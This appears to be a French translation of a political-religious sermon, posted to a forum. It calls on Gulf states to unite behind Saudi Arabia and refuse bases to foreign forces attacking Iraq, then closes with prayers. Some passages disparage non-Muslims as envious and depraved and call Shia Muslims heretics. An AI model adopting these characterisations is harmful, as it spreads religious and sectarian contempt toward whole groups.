    Tous les pays islamiques doivent s'aimer les uns les autres, doivent s'aider les uns les autres et se soutenir. En particulier face au terrible danger auquel sont maintenant confrontés les pays musulmans. C'est le plan des kouffar d'interférer dans les affaires des musulmans pour pouvoir les diviser, les aliéner les uns aux autres et les détruire complètement. Il est donc impératif pour tous les pays islamiques, en particulier les états du Golf, d'adopter un soutien mutuel et une coopération. Il est essentiel pour les états du Golf de n'accepter aucune opinion individuelle ni décision de controverse en matière d'intérêts collectifs. Aucun des états du Golf ne doit passer de résolution sans consulter d'abord le gouvernement saoudien car de ce royaume dépend l'existence et la continuation de ces états. Ces pays du Golf, après tirer leur force d’Allah , dépendent de l'Arabie saoudite aussi pour leur solidarité.

    Le royaume est un pilier de la force de ces états. Il incombe aussi à tous ces pays de ne fournir aucune base militaire aux ennemis d’Allah pour frapper l'Irak. Car Allah a créé tous les musulmans comme étant un seul corps, et donner des bases aux forces anti-islamiques ne causera que des souffrances aux musulmans d'Irak.

    Bien qu'une solution au problème irakien soit imminente, les puissances mondiales ne s'empêcheront pas de créer une nouvelle crise pour atteindre leurs fins égoïstes. Donc elles ne doivent pas être autorisées à trouver un allié dans les pays arabes.

    De plus, les pays arabes ne doivent pas autoriser les avions porteurs américains ni d'aucun autre pays koufri à utiliser leurs bases pour lancer des attaques contre un pays musulmans. Ils ne doivent pas non plus permettre l'établissement de bases militaires dans leurs pays.

    O Musulmans ! Craignez Allah Seul. Il est nécessaire que tous les pays islamiques et arabes coopèrent pleinement et aide l'Arabie Saoudite à expulser les bateaux de guerre et les troupes chrétiennes et juives des terres arabes. Car le Messager d’Allah a dit : « Deux religions ne peuvent pas coexister en Arabie »

    Les gouvernements de cette région sont pleinement conscients de leur responsabilité et de la nécessité de maintenir la paix. S'ils restent sains et saufs de toute interférence des grandes puissances et ne restera aucun danger à son existence.

    O Musulmans! Soyez les aides et les supporteurs les uns des autres. Soyez bien conscient du fait que ces kouffar sont jaloux de vous. Ils vous envient vous et votre plaisante atmosphère car les cieux de leurs villes sont pollués de fumée des usines, leurs lieux de culte puent le mal de leurs péchés, et la dépravation de leurs actions est détestée d’Allah. Ils en veulent à chacune de vos possessions. Et la plus grande chose qu'ils jalousent c'est votre foi, votre morale.

    O gens d’Allah, craignez-Le comme il Lui est dû, et écoutez les dires du Messager d’Allah :

    « Très bientôt, d'autres nations s'inviteront les unes les autres pour vous attaquer et vous détruire comme des gens qui s'invitent autour d'un plat de nourriture. »

    Les pieux compagnons ont demandé au Messager : « O Envoyé d’Allah! Ceci arrivera-t-il parce que nous serons peu en nombre à ce moment? « Non. » Répondit le Prophète . Vous serez nombreux mais vous serez comme l'écume de la mer, faibles comme de la paille. Allah retirera des cœurs de vos ennemis l'horreur et la terreur, et Il remplira vos cœurs avec le Wahn (càd la lâcheté). »

    Et les compagnons demandèrent : "Qu'est-ce que le Wahn ?" « L'amour du monde et la haine de la mort. » Répondit le Messager d’Allah

    O peuple d’Allah! En vérité Allah et Ses anges envoient leurs bénédictions sur le Prophète . O peuple de la Foi, envoyez Duroud et Salam sur le saint Prophète.

    Le Messager d’Allah a dit : "La personne qui envoie Duroud sur moi une fois est béni par Allah Ta`ala 10 fois". Alors envoyez Durood sur le premier et le dernier Prophète .

    O Allah, accorde tes prières au Messager comme tu as accordé tes prières à Ibrahim . En vérité, Tu es digne de louanges, les plus éminentes et exaltées. Et accorde ta bénédiction au Messager comme Tu l'as fait sur Ibrahim . En vérité Tu es digne de louanges, les plus glorieuses et les plus éminentes.

    O Allah accorde ton approbation aux Calife bien guidé Abu Bakr, `Omar, `Othmane et 'Ali et à tous les pieux compagnons

    O Seigneur de l'univers, soit satisfait de ceux qui les suivent de la meilleure façon possible. O Allah! Le Très Miséricordieux, accorde nous Ton approbation divine.


    O Allah! Rends inefficaces et inutiles les conspirations et les stratagèmes des ennemis de l'Islam.

    O Allah! Quiconque porte de la malice et des mauvaises intentions envers nous et nos villes, fais que leur malice se retourne contre eux. Interviens entre nous et leur mal.

    O Allah, Seigneur de l'univers en vérité Tu as le pouvoir sur toute chose. Nous te présentons devant chaque kafir et son opposition. Nous recherchons ton aide contre eux. Par Toi nous nous défendons contre les Moushrikines.



    O Allah, nous cherchons Ta protection contre le mal des Chiites, les hérétiques. Tu en vérité l'Omnipotent.

    O Allah! Crée de l'affection dans les cœurs des musulmans les uns pour les autres.

    Réforme les, guide les vers le chemin de sécurité et de la paix. Tire les des ténèbres vers la lumière, aide-les contre Tes et leurs ennemis.

    Notre seigneur, accorde-nous ta bienveillance en ce monde et dans l'au-delà aussi.

    Sauve nous du tourment de l'enfer.

    O Allah! Accorde la sécurité à notre Imam et accorde-lui l'opportunité d'accomplir les actions que Tu aimes et que Tu acceptes.

    O Allah! Compte-le parmi ceux qui guident les autres sur le chemin droit, et qui sont eux-mêmes bien guidés. O Allah, assiste-le dans les matières religieuses et matérielles. O Allah, quand les matières sont douteuses, quand c'est difficile de reconnaître le Haq, d'agir selon lui, guide-les vers ce qui est Haq. O Allah, dirige leur 'batin'.

    O Allah! Seigneur de l'univers, accorde aux musulmans la capacité d'accomplir les actions dignes de Ton approbation, qui peuvent gagner Tes faveurs divines.

    O peuple d’Allah! Allah t'ordonne la justice. Il t'ordonne de faire le bien et d'être bon envers les tiens, et Il interdit les actes honteux (les turpitudes), l'injustice et la rébellion: Il t'instruit pour que tu reçoives l'avertissement.

    Soyez fidèles au pacte d’Allah après l'avoir contracté et ne violez pas vos serments après les avoir solennellement prêtés et avoir pris Allah comme garant [de votre bonne foi]. Vraiment Allah sait ce que vous faites![Sourate An-Nahl 16:91]

    Rappelez-vous Allah, qui est Grand et Glorieux et Il se rappellera de vous. Et remerciez-le pour ses nombreuses faveurs qu'Il vous a accordées, Allah vous accordera plus. Le rappel (zikr) d’Allah est une grande chose en vérité. Et Allah sait bien tout ce que vous faites.

      La date/heure actuelle est Jeu 23 Nov - 8:41